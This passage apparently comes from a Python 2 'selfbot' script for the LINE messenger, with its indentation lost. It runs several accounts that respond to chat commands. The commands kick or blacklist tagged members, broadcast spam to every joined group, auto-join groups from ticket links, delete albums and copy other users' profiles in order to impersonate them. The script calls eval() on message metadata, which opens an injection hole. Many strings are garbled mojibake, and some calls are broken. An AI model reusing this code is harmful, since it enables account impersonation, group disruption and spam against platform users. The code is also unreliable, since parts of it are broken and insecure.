X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv1 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv2 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv3 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in Bots and staff:
midd = msg.text.replace("Kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "1 kick " in msg.text:
midd = msg.text.replace("1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "2 kick " in msg.text:
midd = msg.text.replace("2 kick ","")
ki2.kickoutFromGroup(msg.to,[midd])
elif "3 kick " in msg.text:
midd = msg.text.replace("3 kick ","")
ki3.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in Bots or staff:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "1 invite " in msg.text:
midd = msg.text.replace("Cv1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "2 invite " in msg.text:
midd = msg.text.replace("Cv2 invite ","")
ki2.findAndAddContactsByMid(midd)
ki2.inviteIntoGroup(msg.to,[midd])
elif "3 invite " in msg.text:
midd = msg.text.replace("Cv3 invite ","")
ki3.findAndAddContactsByMid(midd)
ki3.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki2.sendMessage(msg)
elif msg.text in ["3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
ki3.sendMessage(msg)
elif msg.text in ["4"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ki4.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#-----Fungsi List Group------#
elif msg.text in ["List group"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[~]%s\n" % (cl.getGroup(i).name +str (len (cl.getGroup(i).members)))
cl.sendText(msg.to,"========[List Group]========\n"+ h +"Total Group :" +str(len(gid)))
#-----Finish--------#
#-------------Fungsi Creator Start-----------------#
elif msg.text in ["Creator"]:
if msg.toType == 2:
msg.contentType = 13
Creatorbot = "u9e5a757e7b6e466baf87e8f747d96eb5"
try:
msg.contentMetadata = {'mid': Creatorbot}
except:
Creatorbot = "Error"
cl.sendText(msg.to, "My Creator : IP/nhttp://line.me/ti/p/~fras999")
cl.sendMessage(msg)
#-------------Fungsi Creator Finish-----------------#
#-------------Fungsi Kick By Tag---------------------#
elif ("Bye " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(op.param1, cl.getContact(op.param3).displayName + " ~Sorry (*´・ω・*)")
except:
pass
#-------------Fungsi Kick By Tag---------------------#
#-------------Fungsi Ban By Tag---------------------#
elif ("BL " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Blacklist")
except:
pass
#-------------Fungsi Ban By Tag Finish---------------------#
elif msg.text in ["cancel","Cancel"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv cancel","Bot cancel"]:
if msg.toType == 2:
G = ki.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Open","Link on"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 open","Cv1 link on"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Close","Link off"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 close","Cv1 link off"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = ki.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "Id" == msg.text:
cl.sendText(msg.to,msg.to)
elif "Mid all" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
ki2.sendText(msg.to,Bmid)
ki3.sendText(msg.to,Cmid)
ki4.sendText(msg.to,Dmid)
ki5.sendText(msg.to,Emid)
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text in ["Wc"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.text in ["TL:"]:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Bc: " in msg.text:
bc = msg.text.replace("Bc: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in admin:
for i in gid:
cl.sendText(i,"=======[BROADCAST]=======\n\n"+bc+"\n\nContact Me : line.me/ti/p/~fras88")
cl.sendText(msg.to,"Success BC BosQ")
elif "Name: " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("Name: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + "Done")
elif "1Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("1Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"name " + string + "Done")
elif "2Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("2Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"name" + string + "Done")
elif "3Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("3Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"name" + string + "Done")
elif "4Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("4Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"name" + string + "Done")
elif "5Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("5Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"name" + string + "Done")
elif "All: " in msg.text:
string = msg.text.replace("All: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
ki.sendText(msg.to,"name" + string + "Done")
ki2.sendText(msg.to,"name" + string + "Done")
ki3.sendText(msg.to,"name" + string + "Done")
ki4.sendText(msg.to,"name" + string + "Done")
ki5.sendText(msg.to,"name" + string + "Done")
elif msg.text in ["Mc "]:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#---------------#
elif msg.text in ["ajo on"]:
if msg.from_ in Bots or staff:
if wait["AllProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
wait["Protectguest"] = True
wait["Protectgr"] = True
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["ajo off"]:
if msg.from_ in Bots or staff:
if wait["AllProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
wait["Protectguest"] = False
wait["Protectgr"] = False
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["M on"]:
if msg.from_ in Bots or staff:
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["M off"]:
if msg.from_ in Bots or staff:
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Bi on","Guest on"]:
if msg.from_ in admin:
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block invite on")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Bi off","guest off"]:
if msg.from_ in admin:
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block invite off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block invite off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in Bots or staff:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in Bots or staff:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cn on","proc on"]:
if msg.from_ in Bots or staff:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cn off","proc off"]:
if msg.from_ in Bots or staff:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]:
if msg.from_ in admin or staff:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡��:オフ","K off","Contact off","顯示��關"]:
if msg.from_ in admin or staff:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オン","Join on","Auto join:on","自動åƒåŠ ï¼šé–‹"]:
if msg.from_ in admin or staff:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オフ","Join off","Auto join:off","自動åƒåŠ ï¼šé—œ"]:
if msg.from_ in admin or staff:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒ç»ã€‚è¦æ—¶å¼€è¯·æŒ‡å®šäººæ•°å‘é€")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°ç»„用自动邀请拒ç»")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin or staff:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if msg.from_ in admin or staff:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin or staff:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin or staff:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["View"]:
md = ""
if wait["MProtection"] == True: md+=" MProtection : on\n"
else: md+=" MProtection : off\n"
if wait["Protectcancel"] == True: md+=" Protect Cancel : on\n"
else: md+=" Protect Cancel : off\n"
if wait["Protectgr"] == True: md+=" Protectgr : on\n"
else: md+=" Protectgr : off\n"
if wait["Protectguest"] == True: md+=" Block Invite : on\n"
else: md+=" Block Invite : off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
if wait["atjointicket"] == True: md+=" Auto Join Group by Ticket : on\n"
else:md+=" Auto Join Group by Ticket : off\n"
cl.sendText(msg.to,md)
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "Album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "Album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id","群組全id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin or staff:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif "album remove→" in msg.text:
gid = msg.text.replace("album remove→","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•候語確èª"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#---------------------Sc invite owner ke group------
elif "/invitemeto: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/invitemeto: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é 留言:開"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["コメント:オフ","Comment on","Comment off","自動首é 留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Comment","留言確èª"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Jam on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Jam off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam Update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#-----------------------------------------------
#-----------------------------------------------
elif "Check:" in msg.text:
midd = msg.text.replace("Check:","")
msg.contentType = 13
msg.contentMetadata = {"mid":midd}
cl.sendMessage(msg)
elif "Clone all " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.CloneContactProfile(target)
ki2.CloneContactProfile(target)
ki3.CloneContactProfile(target)
ki4.CloneContactProfile(target)
ki5.CloneContactProfile(target)
ki.sendText(msg.to,"Clone Success")
ki2.sendText(msg.to,"Clone Success")
ki3.sendText(msg.to,"Clone Success")
ki4.sendText(msg.to,"Clone Success")
ki5.sendText(msg.to,"Clone Success")
except Exception as e:
cl.sendText(msg.to,"Clone Fail")
print e
elif msg.text in ["Backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to,"Backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[Copy]"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Succes")
except Exception as e:
print e
elif "Allbio:" in msg.text:
if msg.from_ in admin:
